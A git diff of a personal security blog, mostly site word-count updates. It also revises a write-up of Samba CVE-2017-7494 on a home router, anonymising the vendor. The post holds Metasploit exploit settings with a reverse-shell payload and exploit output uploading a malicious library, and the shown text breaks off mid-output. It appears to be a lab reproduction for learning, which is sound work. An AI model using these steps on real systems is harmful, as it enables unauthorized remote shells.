From b13450713efef02df896a95e110e92b122fdf291 Mon Sep 17 00:00:00 2001
From: Cool-Y <1072916769@qq.com>
Date: Sat, 27 Jul 2019 14:42:04 +0800
Subject: [PATCH] Site updated: 2019-07-27 14:41:41

---
 2000/01/01/hello-world/index.html             |  2 +-
 .../BIBA访问控制模型实现(python)/index.html   |  2 +-
 2018/12/15/miio-control/index.html            |  2 +-
 2018/12/23/基于规则引擎发现IOT设备/index.html |  2 +-
 2018/12/25/TCPDUMP拒绝服务攻击漏洞/index.html |  2 +-
 .../wifi半双工侧信道攻击学习笔记/index.html   |  2 +-
 2019/02/22/qq数据库的加密解密/index.html      |  2 +-
 2019/03/16/小米固件工具mkxqimage/index.html   |  2 +-
 2019/03/23/auto-send-WX/index.html            |  6 +-
 2019/03/25/Samba-CVE/index.html               | 61 ++++++++++---------
 2019/03/28/逆向工程实验/index.html            |  6 +-
 2019/04/15/Caving-db-storage/index.html       |  2 +-
 2019/04/21/XIAOMI-UPnP/index.html             |  2 +-
 2019/05/13/PE-file/index.html                 |  2 +-
 2019/05/14/pack-and-unpack/index.html         |  2 +-
 2019/07/01/AFL-first-learn/index.html         |  2 +-
 2019/07/09/afl-first-try/index.html           |  2 +-
 2019/07/10/x86basic/index.html                |  2 +-
 2019/07/16/linux-pwn-32/index.html            |  2 +-
 2019/07/24/web-dvwa/index.html                |  2 +-
 2019/07/24/获取固件/index.html                |  2 +-
 2019/07/25/Debug-a-router-firmware/index.html |  2 +-
 about/index.html                              |  2 +-
 archives/2000/01/index.html                   |  2 +-
 archives/2000/index.html                      |  2 +-
 archives/2018/11/index.html                   |  2 +-
 archives/2018/12/index.html                   |  2 +-
 archives/2018/index.html                      |  2 +-
 archives/2019/01/index.html                   |  2 +-
 archives/2019/02/index.html                   |  2 +-
 archives/2019/03/index.html                   |  4 +-
 archives/2019/04/index.html                   |  2 +-
 archives/2019/05/index.html                   |  2 +-
 archives/2019/07/index.html                   |  2 +-
 archives/2019/index.html                      |  2 +-
 archives/2019/page/2/index.html               |  4 +-
 archives/index.html                           |  2 +-
 archives/page/2/index.html                    |  4 +-
 archives/page/3/index.html                    |  2 +-
 baidusitemap.xml                              | 12 ++--
 bookmarks/index.html                          |  2 +-
 categories/IOT/index.html                     |  4 +-
 categories/Pwn二进制漏洞/index.html           |  2 +-
 categories/index.html                         |  2 +-
 categories/web/index.html                     |  2 +-
 categories/二进制/index.html                  |  2 +-
 categories/加密解密/index.html                |  2 +-
 categories/杂七杂八/index.html                |  2 +-
 categories/理论学习/index.html                |  2 +-
 categories/顶会论文/index.html                |  2 +-
 index.html                                    |  2 +-
 page/2/index.html                             | 16 ++---
 page/3/index.html                             |  2 +-
 search.xml                                    |  4 +-
 sitemap.xml                                   | 32 +++++-----
 tags/AFL/index.html                           |  2 +-
 tags/CVE/index.html                           |  4 +-
 tags/IoT/index.html                           |  2 +-
 tags/MiniUPnP/index.html                      |  2 +-
 tags/PE/index.html                            |  2 +-
 tags/QQ/index.html                            |  2 +-
 tags/SSH/index.html                           |  2 +-
 tags/Samba/index.html                         |  4 +-
 tags/TCPDUMP/index.html                       |  2 +-
 tags/USENIX/index.html                        |  2 +-
 tags/Windows/index.html                       |  2 +-
 tags/ctf/index.html                           |  2 +-
 tags/index.html                               |  2 +-
 tags/itchat/index.html                        |  2 +-
 tags/linux/index.html                         |  2 +-
 tags/miio/index.html                          |  2 +-
 tags/pwn/index.html                           |  2 +-
 tags/python/index.html                        |  2 +-
 tags/web/index.html                           |  2 +-
 tags/wifi/index.html                          |  2 +-
 tags/中间人/index.html                        |  2 +-
 tags/二进制/index.html                        |  2 +-
 tags/侧信道攻击/index.html                    |  2 +-
 tags/取证/index.html                          |  2 +-
 tags/复原文件/index.html                      |  2 +-
 tags/密码/index.html                          |  2 +-
 tags/小米/index.html                          |  2 +-
 tags/微信/index.html                          |  2 +-
 tags/拒绝服务攻击/index.html                  |  2 +-
 tags/数据库/index.html                        |  2 +-
 tags/数据挖掘/index.html                      |  2 +-
 tags/文件格式/index.html                      |  2 +-
 tags/栈溢出/index.html                        |  2 +-
 tags/模型实现/index.html                      |  2 +-
 tags/模糊测试/index.html                      |  2 +-
 tags/漏洞/index.html                          |  2 +-
 tags/破解/index.html                          |  2 +-
 tags/硬件层/index.html                        |  2 +-
 tags/自然语言处理/index.html                  |  2 +-
 tags/访问控制/index.html                      |  2 +-
 tags/调试/index.html                          |  2 +-
 tags/路由器/index.html                        |  2 +-
 tags/远程执行/index.html                      |  4 +-
 tags/逆向/index.html                          |  2 +-
 tags/重放攻击/index.html                      |  2 +-
 100 files changed, 171 insertions(+), 166 deletions(-)

diff --git a/2000/01/01/hello-world/index.html b/2000/01/01/hello-world/index.html
index eb8990b4..a353a696 100644
--- a/2000/01/01/hello-world/index.html
+++ b/2000/01/01/hello-world/index.html
@@ -641,7 +641,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">67.6k</span>
+    <span title="Site words total count">67.7k</span>
   
 </div>
 
diff --git a/2018/11/16/BIBA访问控制模型实现(python)/index.html b/2018/11/16/BIBA访问控制模型实现(python)/index.html
index 5a2a8282..3e4d96f9 100644
--- a/2018/11/16/BIBA访问控制模型实现(python)/index.html
+++ b/2018/11/16/BIBA访问控制模型实现(python)/index.html
@@ -829,7 +829,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">67.6k</span>
+    <span title="Site words total count">67.7k</span>
   
 </div>
 
diff --git a/2018/12/15/miio-control/index.html b/2018/12/15/miio-control/index.html
index 42c7753d..70ccede6 100644
--- a/2018/12/15/miio-control/index.html
+++ b/2018/12/15/miio-control/index.html
@@ -731,7 +731,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">67.6k</span>
+    <span title="Site words total count">67.7k</span>
   
 </div>
 
diff --git a/2018/12/23/基于规则引擎发现IOT设备/index.html b/2018/12/23/基于规则引擎发现IOT设备/index.html
index 478313fd..dc1b41f1 100644
--- a/2018/12/23/基于规则引擎发现IOT设备/index.html
+++ b/2018/12/23/基于规则引擎发现IOT设备/index.html
@@ -731,7 +731,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">67.6k</span>
+    <span title="Site words total count">67.7k</span>
   
 </div>
 
diff --git a/2018/12/25/TCPDUMP拒绝服务攻击漏洞/index.html b/2018/12/25/TCPDUMP拒绝服务攻击漏洞/index.html
index 2ef00d99..f8b0b5f2 100644
--- a/2018/12/25/TCPDUMP拒绝服务攻击漏洞/index.html
+++ b/2018/12/25/TCPDUMP拒绝服务攻击漏洞/index.html
@@ -736,7 +736,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">67.6k</span>
+    <span title="Site words total count">67.7k</span>
   
 </div>
 
diff --git a/2019/01/16/wifi半双工侧信道攻击学习笔记/index.html b/2019/01/16/wifi半双工侧信道攻击学习笔记/index.html
index ec67a16a..a5283111 100644
--- a/2019/01/16/wifi半双工侧信道攻击学习笔记/index.html
+++ b/2019/01/16/wifi半双工侧信道攻击学习笔记/index.html
@@ -859,7 +859,7 @@ Server   -------wire----------|
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">67.6k</span>
+    <span title="Site words total count">67.7k</span>
   
 </div>
 
diff --git a/2019/02/22/qq数据库的加密解密/index.html b/2019/02/22/qq数据库的加密解密/index.html
index 619d2981..4adc8878 100644
--- a/2019/02/22/qq数据库的加密解密/index.html
+++ b/2019/02/22/qq数据库的加密解密/index.html
@@ -708,7 +708,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">67.6k</span>
+    <span title="Site words total count">67.7k</span>
   
 </div>
 
diff --git a/2019/03/16/小米固件工具mkxqimage/index.html b/2019/03/16/小米固件工具mkxqimage/index.html
index 64be699a..8e613439 100644
--- a/2019/03/16/小米固件工具mkxqimage/index.html
+++ b/2019/03/16/小米固件工具mkxqimage/index.html
@@ -717,7 +717,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">67.6k</span>
+    <span title="Site words total count">67.7k</span>
   
 </div>
 
diff --git a/2019/03/23/auto-send-WX/index.html b/2019/03/23/auto-send-WX/index.html
index 29086f41..ca34f0cc 100644
--- a/2019/03/23/auto-send-WX/index.html
+++ b/2019/03/23/auto-send-WX/index.html
@@ -528,8 +528,8 @@
 
           <div class="post-nav-prev post-nav-item">
             
-              <a href="/2019/03/25/Samba-CVE/" rel="prev" title="小米路由器与Samba漏洞CVE-2017-7494">
-                小米路由器与Samba漏洞CVE-2017-7494 <i class="fa fa-chevron-right"></i>
+              <a href="/2019/03/25/Samba-CVE/" rel="prev" title="某厂商路由器与Samba漏洞CVE-2017-7494">
+                某厂商路由器与Samba漏洞CVE-2017-7494 <i class="fa fa-chevron-right"></i>
               </a>
             
           </div>
@@ -725,7 +725,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">67.6k</span>
+    <span title="Site words total count">67.7k</span>
   
 </div>
 
diff --git a/2019/03/25/Samba-CVE/index.html b/2019/03/25/Samba-CVE/index.html
index 86b6e191..7780c35e 100644
--- a/2019/03/25/Samba-CVE/index.html
+++ b/2019/03/25/Samba-CVE/index.html
@@ -79,13 +79,13 @@
 
 
 
-<meta name="description" content="小米路由器与Samba漏洞CVE-2017-7494漏洞描述Samba服务器软件存在远程执行代码漏洞。攻击者可以利用客户端将指定库文件上传到具有可写权限的共享目录，会导致服务器加载并执行指定的库文件。具体执行条件如下：  服务器打开了文件/打印机共享端口445，让其能够在公网上访问  共享文件拥有写入权限  恶意攻击者需猜解Samba服务端共享目录的物理路径   Samba介绍Samba是在Lin">
+<meta name="description" content="漏洞描述Samba服务器软件存在远程执行代码漏洞。攻击者可以利用客户端将指定库文件上传到具有可写权限的共享目录，会导致服务器加载并执行指定的库文件。具体执行条件如下：  服务器打开了文件/打印机共享端口445，让其能够在公网上访问  共享文件拥有写入权限  恶意攻击者需猜解Samba服务端共享目录的物理路径   Samba介绍Samba是在Linux和Unix系统上实现SMB协议的一个免费软件，由">
 <meta name="keywords" content="Samba,远程执行,CVE">
 <meta property="og:type" content="article">
-<meta property="og:title" content="小米路由器与Samba漏洞CVE-2017-7494">
+<meta property="og:title" content="某厂商路由器与Samba漏洞CVE-2017-7494">
 <meta property="og:url" content="https://cool-y.github.io/2019/03/25/Samba-CVE/index.html">
 <meta property="og:site_name" content="混元霹雳手">
-<meta property="og:description" content="小米路由器与Samba漏洞CVE-2017-7494漏洞描述Samba服务器软件存在远程执行代码漏洞。攻击者可以利用客户端将指定库文件上传到具有可写权限的共享目录，会导致服务器加载并执行指定的库文件。具体执行条件如下：  服务器打开了文件/打印机共享端口445，让其能够在公网上访问  共享文件拥有写入权限  恶意攻击者需猜解Samba服务端共享目录的物理路径   Samba介绍Samba是在Lin">
+<meta property="og:description" content="漏洞描述Samba服务器软件存在远程执行代码漏洞。攻击者可以利用客户端将指定库文件上传到具有可写权限的共享目录，会导致服务器加载并执行指定的库文件。具体执行条件如下：  服务器打开了文件/打印机共享端口445，让其能够在公网上访问  共享文件拥有写入权限  恶意攻击者需猜解Samba服务端共享目录的物理路径   Samba介绍Samba是在Linux和Unix系统上实现SMB协议的一个免费软件，由">
 <meta property="og:locale" content="zh-Hans">
 <meta property="og:image" content="https://www.wzsite.cn/2018/07/20/Samba%E8%BF%9C%E7%A8%8B%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90%20CVE-2017-7494/02-00-46.png">
 <meta property="og:image" content="https://www.wzsite.cn/2018/07/20/Samba%E8%BF%9C%E7%A8%8B%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90%20CVE-2017-7494/01-59-58.jpg">
@@ -100,10 +100,10 @@
 <meta property="og:image" content="https://www.wzsite.cn/2018/07/20/Samba%E8%BF%9C%E7%A8%8B%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90%20CVE-2017-7494/01-38-28.jpg">
 <meta property="og:image" content="https://www.wzsite.cn/2018/07/20/Samba%E8%BF%9C%E7%A8%8B%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90%20CVE-2017-7494/01-43-02.jpg">
 <meta property="og:image" content="https://www.wzsite.cn/2018/07/20/Samba%E8%BF%9C%E7%A8%8B%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90%20CVE-2017-7494/01-45-01.png">
-<meta property="og:updated_time" content="2019-04-15T07:35:38.080Z">
+<meta property="og:updated_time" content="2019-07-27T06:39:41.484Z">
 <meta name="twitter:card" content="summary">
-<meta name="twitter:title" content="小米路由器与Samba漏洞CVE-2017-7494">
-<meta name="twitter:description" content="小米路由器与Samba漏洞CVE-2017-7494漏洞描述Samba服务器软件存在远程执行代码漏洞。攻击者可以利用客户端将指定库文件上传到具有可写权限的共享目录，会导致服务器加载并执行指定的库文件。具体执行条件如下：  服务器打开了文件/打印机共享端口445，让其能够在公网上访问  共享文件拥有写入权限  恶意攻击者需猜解Samba服务端共享目录的物理路径   Samba介绍Samba是在Lin">
+<meta name="twitter:title" content="某厂商路由器与Samba漏洞CVE-2017-7494">
+<meta name="twitter:description" content="漏洞描述Samba服务器软件存在远程执行代码漏洞。攻击者可以利用客户端将指定库文件上传到具有可写权限的共享目录，会导致服务器加载并执行指定的库文件。具体执行条件如下：  服务器打开了文件/打印机共享端口445，让其能够在公网上访问  共享文件拥有写入权限  恶意攻击者需猜解Samba服务端共享目录的物理路径   Samba介绍Samba是在Linux和Unix系统上实现SMB协议的一个免费软件，由">
 <meta name="twitter:image" content="https://www.wzsite.cn/2018/07/20/Samba%E8%BF%9C%E7%A8%8B%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90%20CVE-2017-7494/02-00-46.png">
 
 
@@ -140,7 +140,7 @@
 
 
 
-  <title>小米路由器与Samba漏洞CVE-2017-7494 | 混元霹雳手</title>
+  <title>某厂商路由器与Samba漏洞CVE-2017-7494 | 混元霹雳手</title>
   
 
 
@@ -336,7 +336,7 @@
 
         
         
-          <h1 class="post-title" itemprop="name headline">小米路由器与Samba漏洞CVE-2017-7494</h1>
+          <h1 class="post-title" itemprop="name headline">某厂商路由器与Samba漏洞CVE-2017-7494</h1>
         
 
         <div class="post-meta">
@@ -388,7 +388,7 @@
 
           
           
-             <span id="/2019/03/25/Samba-CVE/" class="leancloud_visitors" data-flag-title="小米路由器与Samba漏洞CVE-2017-7494">
+             <span id="/2019/03/25/Samba-CVE/" class="leancloud_visitors" data-flag-title="某厂商路由器与Samba漏洞CVE-2017-7494">
                <span class="post-meta-divider">|</span>
                <span class="post-meta-item-icon">
                  <i class="fa fa-eye"></i>
@@ -411,7 +411,7 @@
                 </span>
                 
                 <span title="字数统计">
-                  1.6k 字
+                  1.7k 字
                 </span>
               
 
@@ -425,7 +425,7 @@
                 </span>
                 
                 <span title="阅读时长">
-                  6 分钟
+                  7 分钟
                 </span>
               
             </div>
@@ -446,7 +446,7 @@
       
 
       
-        <h1 id="小米路由器与Samba漏洞CVE-2017-7494"><a href="#小米路由器与Samba漏洞CVE-2017-7494" class="headerlink" title="小米路由器与Samba漏洞CVE-2017-7494"></a>小米路由器与Samba漏洞CVE-2017-7494</h1><h2 id="漏洞描述"><a href="#漏洞描述" class="headerlink" title="漏洞描述"></a>漏洞描述</h2><p>Samba服务器软件存在远程执行代码漏洞。攻击者可以利用客户端将指定库文件上传到具有可写权限的共享目录，会导致服务器加载并执行指定的库文件。<br>具体执行条件如下：</p>
+        <h1 id="漏洞描述"><a href="#漏洞描述" class="headerlink" title="漏洞描述"></a>漏洞描述</h1><p>Samba服务器软件存在远程执行代码漏洞。攻击者可以利用客户端将指定库文件上传到具有可写权限的共享目录，会导致服务器加载并执行指定的库文件。<br>具体执行条件如下：</p>
 <ol>
 <li><p>服务器打开了文件/打印机共享端口445，让其能够在公网上访问</p>
 </li>
@@ -455,31 +455,34 @@
 <li><p>恶意攻击者需猜解Samba服务端共享目录的物理路径</p>
 </li>
 </ol>
-<h2 id="Samba介绍"><a href="#Samba介绍" class="headerlink" title="Samba介绍"></a>Samba介绍</h2><p>Samba是在Linux和Unix系统上实现SMB协议的一个免费软件，由服务器及客户端程序构成。SMB（Server Messages Block，信息服务块）是一种在局域网上共享文件和打印机的一种通信协议，它为局域网内的不同计算机之间提供文件及打印机等资源的共享服务。</p>
+<h1 id="Samba介绍"><a href="#Samba介绍" class="headerlink" title="Samba介绍"></a>Samba介绍</h1><p>Samba是在Linux和Unix系统上实现SMB协议的一个免费软件，由服务器及客户端程序构成。SMB（Server Messages Block，信息服务块）是一种在局域网上共享文件和打印机的一种通信协议，它为局域网内的不同计算机之间提供文件及打印机等资源的共享服务。</p>
 <p>SMB协议是客户机/服务器型协议，客户机通过该协议可以访问服务器上的共享文件系统、打印机及其他资源。通过设置“NetBIOS over TCP/IP”使得Samba不但能与局域网络主机分享资源，还能与全世界的电脑分享资源。</p>
-<h2 id="漏洞成因"><a href="#漏洞成因" class="headerlink" title="漏洞成因"></a>漏洞成因</h2><p>处于\source3\rpc_server\src_pipe.c的is_known_pipename()函数未对传进来的管道名pipename的路径分隔符/进行识别过滤，导致可以用绝对路径调用恶意的so文件，从而远程任意代码执行。<br>首先看到is_known_pipename()函数<br><img src="https://www.wzsite.cn/2018/07/20/Samba%E8%BF%9C%E7%A8%8B%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90%20CVE-2017-7494/02-00-46.png" alt></p>
-<p>跟进到smb_probe_module()<br><img src="https://www.wzsite.cn/2018/07/20/Samba%E8%BF%9C%E7%A8%8B%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90%20CVE-2017-7494/01-59-58.jpg" alt></p>
-<p>再跟进到do_smb_load_module()，发现调用的过程就在其中,调用了传进来的moudule_name对应的init_samba_module函数<br><img src="https://www.wzsite.cn/2018/07/20/Samba%E8%BF%9C%E7%A8%8B%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90%20CVE-2017-7494/02-01-19.jpg" alt></p>
-<p>我们可以通过smb服务上传一个恶意的so文件，该文件包含一个输出函数init_samba_module，随后通过上述过程进行调用，执行任意代码。</p>
-<h2 id="漏洞复现"><a href="#漏洞复现" class="headerlink" title="漏洞复现"></a>漏洞复现</h2><h3 id="小米路由器"><a href="#小米路由器" class="headerlink" title="小米路由器"></a>小米路由器</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">netstat -apnt</span><br><span class="line">tcp    0   0 192.168.31.1:445   0.0.0.0:*     LISTEN   0 572 1917/smbd</span><br><span class="line"></span><br><span class="line">nmap 192.168.31.1</span><br><span class="line">139/tcp  open     netbios-ssn</span><br><span class="line">445/tcp  open     microsoft-ds</span><br></pre></td></tr></table></figure>
+<p>某厂商路由器的smbd版本为4.0.21，该漏洞影响Samba 3.5.0到4.6.4/4.5.10/4.4.14的中间版本。</p>
+<h1 id="漏洞成因"><a href="#漏洞成因" class="headerlink" title="漏洞成因"></a>漏洞成因</h1><p>处于<code>\source3\rpc_server\src_pipe.c的is_known_pipename()</code>函数未对传进来的管道名<code>pipename</code>的路径分隔符<code>/</code>进行识别过滤，导致可以用绝对路径调用恶意的so文件，从而远程任意代码执行。<br>首先看到<code>is_known_pipename()`</code>函数<br><img src="https://www.wzsite.cn/2018/07/20/Samba%E8%BF%9C%E7%A8%8B%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90%20CVE-2017-7494/02-00-46.png" alt></p>
+<p>跟进到<code>smb_probe_module()</code><br><img src="https://www.wzsite.cn/2018/07/20/Samba%E8%BF%9C%E7%A8%8B%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90%20CVE-2017-7494/01-59-58.jpg" alt></p>
+<p>再跟进到<code>do_smb_load_module()</code>，发现调用的过程就在其中,调用了传进来的moudule_name对应的init_samba_module函数<br><img src="https://www.wzsite.cn/2018/07/20/Samba%E8%BF%9C%E7%A8%8B%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90%20CVE-2017-7494/02-01-19.jpg" alt></p>
+<p>我们可以通过smb服务上传一个恶意的so文件，随后通过上述过程进行调用，执行任意代码。</p>
+<h1 id="漏洞复现"><a href="#漏洞复现" class="headerlink" title="漏洞复现"></a>漏洞复现</h1><h2 id="某路由器满足条件"><a href="#某路由器满足条件" class="headerlink" title="某路由器满足条件"></a>某路由器满足条件</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">netstat -apnt</span><br><span class="line">tcp    0   0 192.168.31.1:445   0.0.0.0:*     LISTEN   0 572 1917/smbd</span><br><span class="line"></span><br><span class="line">nmap 192.168.31.1</span><br><span class="line">139/tcp  open     netbios-ssn</span><br><span class="line">445/tcp  open     microsoft-ds</span><br></pre></td></tr></table></figure>
 <p><strong><em>端口已开启</em></strong><br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br></pre></td><td class="code"><pre><span class="line">vim /etc/samba/smb.conf</span><br><span class="line">        deadtime = 30</span><br><span class="line">        domain master = yes</span><br><span class="line">        encrypt passwords = true</span><br><span class="line">        enable core files = no</span><br><span class="line">        guest account = nobody</span><br><span class="line">        guest ok = yes</span><br><span class="line">        invalid users =</span><br><span class="line">        local master = yes</span><br><span class="line">        load printers = no</span><br><span class="line">        map to guest = Bad User</span><br><span class="line">        min receivefile size = 16384</span><br><span class="line">        null passwords = yes</span><br><span class="line">        obey pam restrictions = yes</span><br><span class="line">        passdb backend = smbpasswd</span><br><span class="line">        preferred master = yes</span><br><span class="line">        printable = no</span><br><span class="line">        smb encrypt = disabled</span><br><span class="line">        smb passwd file = /etc/samba/smbpasswd</span><br><span class="line">        socket options =  SO_SNDBUFFORCE=1048576 SO_RCVBUFFORCE=1048576</span><br><span class="line">        smb2 max trans = 1048576</span><br><span class="line">        smb2 max write = 1048576</span><br><span class="line">        smb2 max read = 1048576</span><br><span class="line">        write cache size = 262144</span><br><span class="line">        syslog = 2</span><br><span class="line">        syslog only = yes</span><br><span class="line">        use sendfile = yes</span><br><span class="line">        writeable = yes</span><br><span class="line">        log level = 1</span><br><span class="line">        unicode = True</span><br><span class="line">        max log size = 500</span><br><span class="line">        log file = /tmp/log/samba.log</span><br><span class="line">        server role = STANDALONE</span><br><span class="line"></span><br><span class="line">[homes]</span><br><span class="line">        comment     = Home Directories</span><br><span class="line">        browsable   = no</span><br><span class="line">        read only   = no</span><br><span class="line">        create mode = 0750</span><br><span class="line"></span><br><span class="line">[data]                    ***SMB_SHARE_NAME***</span><br><span class="line">        path = /tmp       ***SMB_FOLDER***</span><br><span class="line">        read only = no    ***具备可写权限***</span><br><span class="line">        guest ok = yes    ***允许匿名***</span><br><span class="line">        create mask = 0777</span><br><span class="line">        directory mask = 0777</span><br></pre></td></tr></table></figure></p>
 <p><strong><em>具有可写权限、目录为/tmp</em></strong></p>
-<h2 id="攻击：使用metasploit"><a href="#攻击：使用metasploit" class="headerlink" title="攻击：使用metasploit"></a>攻击：使用metasploit</h2><h3 id="设置攻击参数"><a href="#设置攻击参数" class="headerlink" title="设置攻击参数"></a>设置攻击参数</h3><p>靶机是小米路由器R3，它的系统为mips架构，但是这个库好像对它的支持不是很好<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line">show options</span><br><span class="line"></span><br><span class="line">Module options (exploit/linux/samba/is_known_pipename):</span><br><span class="line"></span><br><span class="line">   Name            Current Setting  Required  Description</span><br><span class="line">   ----            ---------------  --------  -----------</span><br><span class="line">   RHOSTS          192.168.31.1     yes       The target address range or CIDR identifier</span><br><span class="line">   RPORT           445              yes       The SMB service port (TCP)</span><br><span class="line">   SMB_FOLDER                       no        The directory to use within the writeable SMB share</span><br><span class="line">   SMB_SHARE_NAME                   no        The name of the SMB share containing a writeable directory</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">Payload options (generic/shell_reverse_tcp):</span><br><span class="line"></span><br><span class="line">   Name   Current Setting  Required  Description</span><br><span class="line">   ----   ---------------  --------  -----------</span><br><span class="line">   LHOST  192.168.216.129  yes       The listen address (an interface may be specified)</span><br><span class="line">   LPORT  4444             yes       The listen port</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">Exploit target:</span><br><span class="line"></span><br><span class="line">   Id  Name</span><br><span class="line">   --  ----</span><br><span class="line">   7   Linux MIPSLE</span><br></pre></td></tr></table></figure></p>
+<h2 id="攻击：使用metasploit"><a href="#攻击：使用metasploit" class="headerlink" title="攻击：使用metasploit"></a>攻击：使用metasploit</h2><h3 id="设置攻击参数"><a href="#设置攻击参数" class="headerlink" title="设置攻击参数"></a>设置攻击参数</h3><p>靶机是某厂商路由器，它的系统为mips架构，但是这个库好像对它的支持不是很好<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line">show options</span><br><span class="line"></span><br><span class="line">Module options (exploit/linux/samba/is_known_pipename):</span><br><span class="line"></span><br><span class="line">   Name            Current Setting  Required  Description</span><br><span class="line">   ----            ---------------  --------  -----------</span><br><span class="line">   RHOSTS          192.168.31.1     yes       The target address range or CIDR identifier</span><br><span class="line">   RPORT           445              yes       The SMB service port (TCP)</span><br><span class="line">   SMB_FOLDER                       no        The directory to use within the writeable SMB share</span><br><span class="line">   SMB_SHARE_NAME                   no        The name of the SMB share containing a writeable directory</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">Payload options (generic/shell_reverse_tcp):</span><br><span class="line"></span><br><span class="line">   Name   Current Setting  Required  Description</span><br><span class="line">   ----   ---------------  --------  -----------</span><br><span class="line">   LHOST  192.168.216.129  yes       The listen address (an interface may be specified)</span><br><span class="line">   LPORT  4444             yes       The listen port</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">Exploit target:</span><br><span class="line"></span><br><span class="line">   Id  Name</span><br><span class="line">   --  ----</span><br><span class="line">   7   Linux MIPSLE</span><br></pre></td></tr></table></figure></p>
 <h3 id="执行攻击"><a href="#执行攻击" class="headerlink" title="执行攻击"></a>执行攻击</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">exploit</span><br><span class="line"></span><br><span class="line">[*] Started reverse TCP handler on 192.168.216.129:4444</span><br><span class="line">[*] 192.168.31.1:445 - Using location \\192.168.31.1\data\ for the path</span><br><span class="line">[*] 192.168.31.1:445 - Retrieving the remote path of the share &apos;data&apos;</span><br><span class="line">[*] 192.168.31.1:445 - Share &apos;data&apos; has server-side path &apos;/tmp</span><br><span class="line">[*] 192.168.31.1:445 - Uploaded payload to \\192.168.31.1\data\KcQiOcbk.so</span><br><span class="line">[*] 192.168.31.1:445 - Loading the payload from server-side path 